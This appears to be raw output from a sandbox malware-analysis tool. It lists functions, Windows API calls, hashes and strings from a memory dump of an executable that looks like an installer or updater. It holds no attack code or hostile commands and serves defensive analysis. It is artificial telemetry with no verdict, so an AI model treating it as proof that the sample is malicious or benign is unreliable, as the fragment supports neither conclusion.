                                                                                                                • Instruction ID: a089107a9771c350ead831e8e00b5bb5a12bcc199e39954db30e65ab6dd00094
                                                                                                                • Opcode Fuzzy Hash: bbabf0232d68cd9f1ec0b5716627c09649f0bf2f01ad0bd1af4c4b7e8f4b19c3
                                                                                                                • Instruction Fuzzy Hash: 3E118171810344DFCF60FF64D848B9E77B8AF40349F01842FE40296251D7B8AA88CF95
                                                                                                                APIs
                                                                                                                • GetTopWindow.USER32(?), ref: 004C80C9
                                                                                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004C80FF
                                                                                                                • GetTopWindow.USER32(00000000), ref: 004C810C
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 004C812A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1496643700-0
                                                                                                                • Opcode ID: 145cc8dbf22b260683246793b5ef2e64371eb4ca9d4bac4092889c159fcbf373
                                                                                                                • Instruction ID: a77f8250c159371a58dafb510189ea50f6f1655f5f1a4312a9fbfebb934a284f
                                                                                                                • Opcode Fuzzy Hash: 145cc8dbf22b260683246793b5ef2e64371eb4ca9d4bac4092889c159fcbf373
                                                                                                                • Instruction Fuzzy Hash: 79012D3A00111ABBCF526F919C08FEF3B65EF05350F05801EF91055161CB3AC922EFA9
                                                                                                                APIs
                                                                                                                • SetActiveWindow.USER32(?), ref: 004D08F1
                                                                                                                • DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 004D090C
                                                                                                                • DragQueryFile.SHELL32(?,00000000,?,00000104), ref: 004D092E
                                                                                                                • DragFinish.SHELL32(?), ref: 004D0947
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 892977027-0
                                                                                                                • Opcode ID: 88f65d3623e94e86b649b0edb1eaf16fc68bdf37b9bee31d59f83b78ca7c090a
                                                                                                                • Instruction ID: 6273047b1dacdb82588a39171914f7888b0d2d7cb3e4b550b27c38d8e12f4d70
                                                                                                                • Opcode Fuzzy Hash: 88f65d3623e94e86b649b0edb1eaf16fc68bdf37b9bee31d59f83b78ca7c090a
                                                                                                                • Instruction Fuzzy Hash: DB01ADB1900108BFDF00AF64DC84CAE7BBCEF44398F11406AB164971A2CB70AE81CB68
                                                                                                                APIs
                                                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 004C894E
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004C895A
                                                                                                                • GetSysColor.USER32(00000008), ref: 004C896A
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 004C8974
                                                                                                                  • Part of subcall function 004CD74E: GetWindowLongA.USER32(00000000,000000F0), ref: 004CD75F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$LongObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2871169696-0
                                                                                                                • Opcode ID: 9fae85c6c7260eb8d33c4fb260ce0c7af781723c2c0286247e77dfe8e717d333
                                                                                                                • Instruction ID: 93f14773b1531431a45a83eb5b67c9d7019334d302a10841d722513c189ab90c
                                                                                                                • Opcode Fuzzy Hash: 9fae85c6c7260eb8d33c4fb260ce0c7af781723c2c0286247e77dfe8e717d333
                                                                                                                • Instruction Fuzzy Hash: 26014F79100108AFDFA19F64DC49FBF7B65AB21350F10452AF912D41E1DB35CD90DA5A
                                                                                                                APIs
                                                                                                                • RtlEnterCriticalSection.NTDLL(00526400), ref: 004D4397
                                                                                                                • RtlInitializeCriticalSection.NTDLL(00000000), ref: 004D43A9
                                                                                                                • RtlLeaveCriticalSection.NTDLL(00526400), ref: 004D43B2
                                                                                                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 004D43C4
                                                                                                                  • Part of subcall function 004D42C9: GetVersion.KERNEL32(?,004D436C,?,004D492E,00000010,00000000,00000100,?,?,?,004D3760,004D37C3,004D317A,004C9C8D,00000100,004C9C26), ref: 004D42DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 1193629340-0
                                                                                                                • Opcode ID: 8033cbe9a189f5c6a871eee53e4fa6dcabccd6965b00afc10627ffc93ce199ca
                                                                                                                • Instruction ID: 7ca8f1db5bc0bee56fa40aa34dbc59f305261ca112b03702ed41f06256ae3a9e
                                                                                                                • Opcode Fuzzy Hash: 8033cbe9a189f5c6a871eee53e4fa6dcabccd6965b00afc10627ffc93ce199ca
                                                                                                                • Instruction Fuzzy Hash: 76F04F3510021ADFCB20EF98ECD4967B3ACFF72316B41043BEA4182215D735B45ADAA8
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00464BD9
                                                                                                                  • Part of subcall function 00468117: __EH_prolog.LIBCMT ref: 0046811C
                                                                                                                  • Part of subcall function 00465E15: __EH_prolog.LIBCMT ref: 00465E1A
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047AAD1: __EH_prolog.LIBCMT ref: 0047AAD6
                                                                                                                  • Part of subcall function 004603AA: __EH_prolog.LIBCMT ref: 004603AF
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                  • Part of subcall function 0044FC1E: __EH_prolog.LIBCMT ref: 0044FC23
                                                                                                                Strings
                                                                                                                • IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS, xrefs: 00464C4D
                                                                                                                • IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS, xrefs: 00464FB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$Increment$Decrement
                                                                                                                • String ID: IDS_CTRL_STATICTEXT_BOTTOMINSTRUCTIONS$IDS_CTRL_STATICTEXT_TOPINSTRUCTIONS
                                                                                                                • API String ID: 3082256980-824710809
                                                                                                                • Opcode ID: 983e4cb1bbee89b0c94b8b42cef3ec86b93bd0abe4bbad7f1f79609892c68452
                                                                                                                • Instruction ID: dc456a8bdffd28551670642f11887b9e4bd3c64198162a74c682401b6d146edb
                                                                                                                • Opcode Fuzzy Hash: 983e4cb1bbee89b0c94b8b42cef3ec86b93bd0abe4bbad7f1f79609892c68452
                                                                                                                • Instruction Fuzzy Hash: DCD1B0B1910B049FCB14DF69C846BEEBBF4FF44314F10462EE456A7281DB78AA44CBA5
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00470B2D
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: .ts3$MSG_UPDATE_CLIENT_ENGINE
                                                                                                                • API String ID: 3164693477-4256904655
                                                                                                                • Opcode ID: 1ef78f5cfc7e6bc0e7fd8ff924cc986d36ea0f9063cd2b48905eb48edc73914b
                                                                                                                • Instruction ID: 7b6b29c28156bd8d929e0febf03239d7c92f7645541b7d67c10a62d3710c1908
                                                                                                                • Opcode Fuzzy Hash: 1ef78f5cfc7e6bc0e7fd8ff924cc986d36ea0f9063cd2b48905eb48edc73914b
                                                                                                                • Instruction Fuzzy Hash: E7B1A574915248EFCF04DFA5C985FDEBBB8AF05314F14805EF409A7282CB78AA44CB69
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00428604
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 004286B9
                                                                                                                  • Part of subcall function 0040E49E: __EH_prolog.LIBCMT ref: 0040E4A3
                                                                                                                  • Part of subcall function 0040E49E: lstrlen.KERNEL32(?), ref: 0040E536
                                                                                                                  • Part of subcall function 0040E49E: lstrcpy.KERNEL32(?,?), ref: 0040E546
                                                                                                                  • Part of subcall function 0040E49E: lstrlen.KERNEL32(?), ref: 0040E56C
                                                                                                                  • Part of subcall function 0040E49E: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,?,?,?), ref: 0040E591
                                                                                                                  • Part of subcall function 0040E49E: GetLastError.KERNEL32 ref: 0040E59B
                                                                                                                  • Part of subcall function 0040E49E: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0040E5CB
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$CreateDecrementErrorInterlockedLastMultipleObjectsProcessWait__ftollstrcpy
                                                                                                                • String ID: 0:R
                                                                                                                • API String ID: 3493775157-2078724643
                                                                                                                • Opcode ID: 2a1629367352763115a2870c9bd10c7d513d9ae42b31f3a0b3849c97d29c1d2e
                                                                                                                • Instruction ID: d44a03b7b24bba7751bd61d5d34618116fb83859770f94f7d03436ead19a2939
                                                                                                                • Opcode Fuzzy Hash: 2a1629367352763115a2870c9bd10c7d513d9ae42b31f3a0b3849c97d29c1d2e
                                                                                                                • Instruction Fuzzy Hash: 4B51F636915215AADB04F7B6EC86FFE77A89F15724F20011FF101A61C2DF7C5A81826D
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047005F
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 004C613F: __EH_prolog.LIBCMT ref: 004C6144
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C281A: __EH_prolog.LIBCMT ref: 004C281F
                                                                                                                  • Part of subcall function 004C61B3: lstrlen.KERNEL32(00000000,005108DC,?,?,004098A7,?,005108DC,00000000,?,00000000,00510870,00000000,?,?,?,00000002), ref: 004C61DF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DecrementIncrementlstrlen
                                                                                                                • String ID: .ts1$ftp://
                                                                                                                • API String ID: 1122469558-3531992581
                                                                                                                • Opcode ID: 17ed6d53d82fa884372492280869ad4441fda80bd7862ea76ed06d387506c6f4
                                                                                                                • Instruction ID: b23469b802c3d87ff035e30288ec3f7e072d4780da6447de21843100e3b89ac1
                                                                                                                • Opcode Fuzzy Hash: 17ed6d53d82fa884372492280869ad4441fda80bd7862ea76ed06d387506c6f4
                                                                                                                • Instruction Fuzzy Hash: 14718075801248EADF10EFA1C845FEFBBB8AF14304F10455EF905A3282DB786B48CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043412A
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: 0:R$I
                                                                                                                • API String ID: 3243491680-1600366541
                                                                                                                • Opcode ID: 111e8c79b85105b137a4c019ed7d09d61113b06c70afe54a9a15e350266782eb
                                                                                                                • Instruction ID: df62d6789979d9f3daf6c84f98353f7b6eaf649a8d07728426456e3b4f0ee987
                                                                                                                • Opcode Fuzzy Hash: 111e8c79b85105b137a4c019ed7d09d61113b06c70afe54a9a15e350266782eb
                                                                                                                • Instruction Fuzzy Hash: 8851F339800619AADB05F7A6CC06FEF77689F16368F10424FF511761C2DB7C678582AE
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040C184
                                                                                                                  • Part of subcall function 00408EFE: __EH_prolog.LIBCMT ref: 00408F03
                                                                                                                  • Part of subcall function 00408EFE: GetFileAttributesA.KERNEL32(?), ref: 00408F28
                                                                                                                  • Part of subcall function 004C5707: CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                                                  • Part of subcall function 004C5707: GetLastError.KERNEL32 ref: 004C57F4
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0040C2A5
                                                                                                                  • Part of subcall function 0040C343: IsWindow.USER32(?), ref: 0040C355
                                                                                                                  • Part of subcall function 0040C343: __ftol.LIBCMT ref: 0040C383
                                                                                                                  • Part of subcall function 0040C343: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C394
                                                                                                                  • Part of subcall function 0040C39D: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0040C412
                                                                                                                  • Part of subcall function 0040C39D: TranslateMessage.USER32(?), ref: 0040C442
                                                                                                                  • Part of subcall function 0040C39D: DispatchMessageA.USER32(?), ref: 0040C44C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$FileH_prolog$AttributesCreateDispatchErrorLastPeekSendTranslateWindow__ftollstrcpy
                                                                                                                • String ID: ThN
                                                                                                                • API String ID: 510894268-2830422598
                                                                                                                • Opcode ID: 78c58609502f0026bb3b5c5a8f7fa41b7730c3b93c7170fda8bcbe378e90c44d
                                                                                                                • Instruction ID: 25bdd14736904e7a68876107adc4856bed8a9e72e083bc47d31e4424eccc7f6d
                                                                                                                • Opcode Fuzzy Hash: 78c58609502f0026bb3b5c5a8f7fa41b7730c3b93c7170fda8bcbe378e90c44d
                                                                                                                • Instruction Fuzzy Hash: 88518F35C00249EADF04EFE5D885BEEBB74AF14318F10816EE41172292DB786B49CB29
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00410C67
                                                                                                                  • Part of subcall function 004C60D9: __EH_prolog.LIBCMT ref: 004C60DE
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                  • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologInterlocked$AttributesDecrementErrorFileIncrementLast
                                                                                                                • String ID: .bak$.bak%d
                                                                                                                • API String ID: 677611752-745829535
                                                                                                                • Opcode ID: 7385c34c16d00868352fd2e998f3352109f7392347fb315ea9527b5d4411d65f
                                                                                                                • Instruction ID: 8dc6751980f71ab65e1ded59b00581142b9bb52d9439ec5f0642a256a849fc29
                                                                                                                • Opcode Fuzzy Hash: 7385c34c16d00868352fd2e998f3352109f7392347fb315ea9527b5d4411d65f
                                                                                                                • Instruction Fuzzy Hash: 83417F7A800659EACB01EBE5C845FEFBB78AF14318F10415EF511A3181DB786748CB75
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00430B53
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetPatchInfoA), ref: 00430BC5
                                                                                                                  • Part of subcall function 004AF0B8: RtlFreeHeap.NTDLL(00000000,?,00000000,00000010,?,?,004AF278,00000009,?), ref: 004AF18C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AddressFreeHeapLibraryLoadProclstrlen
                                                                                                                • String ID: MsiGetPatchInfoA
                                                                                                                • API String ID: 2260080404-1707134638
                                                                                                                • Opcode ID: 8a7626d70408cf29df8550467f0c79caeecfdd22aae776b9c0116046193ab3b6
                                                                                                                • Instruction ID: f622c02d9beb288d9a41b1fd29b04a252ada4eada294bb5e6b80a74a96ebaf97
                                                                                                                • Opcode Fuzzy Hash: 8a7626d70408cf29df8550467f0c79caeecfdd22aae776b9c0116046193ab3b6
